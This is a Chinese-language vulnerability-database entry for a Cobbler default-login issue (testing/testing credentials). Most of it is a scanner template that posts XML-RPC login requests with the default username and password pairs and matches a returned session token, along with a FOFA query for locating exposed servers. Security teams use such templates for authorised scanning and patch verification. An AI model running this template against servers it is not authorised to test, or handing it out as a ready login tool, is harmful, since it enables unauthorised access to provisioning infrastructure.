cobbler-default-login: Cobbler Default Login

日期: 2025-08-01 | 影响软件: Cobbler Default Login | POC: 已公开

漏洞描述

Cobbler default login credentials for the testing module (testing/testing) were discovered. fofa "Cobbler"

PoC代码[已公开]

id: cobbler-default-login

info:
  name: Cobbler Default Login
  author: c-sh0
  severity: high
  description: Cobbler default login credentials for the testing module (testing/testing) were discovered.
  reference:
    - https://seclists.org/oss-sec/2022/q1/146
    - https://github.com/cobbler/cobbler/issues/2307
    - https://github.com/cobbler/cobbler/issues/2909
  classification:
    cwe-id: CWE-798
  metadata:
    max-request: 2
  tags: cobbler,default-login,api,seclists,vuln

http:
  - raw:
      - |
        POST {{BaseURL}}/cobbler_api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

        <?xml version='1.0'?>
        <methodCall>
          <methodName>login</methodName>
          <params>
            <param>
              <value>
                <string>{{username}}</string>
              </value>
            </param>
            <param>
              <value>
                <string>{{password}}</string>
              </value>
            </param>
          </params>
        </methodCall>

    attack: pitchfork
    payloads:
      username:
        - cobbler
        - testing
      password:
        - cobbler
        - testing

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - 'text/xml'

      - type: dsl
        dsl:
          - "!contains(tolower(body), '<name>faultCode</name>')"
          - "!contains(tolower(body), 'login failed')"
        condition: or

      - type: regex
        part: body
        regex:
          - "(.*[a-zA-Z0-9].+==)</string></value>"
# digest: 490a004630440220363fcb4592df67716a567c5377b82f78174ea59f506962fb053c281157868bdd022065dd9968da6a477205602f4942613108149fa12e30eb7d40bc199109b5e9ccaf:922c64590222798bb761d5b6d8e72950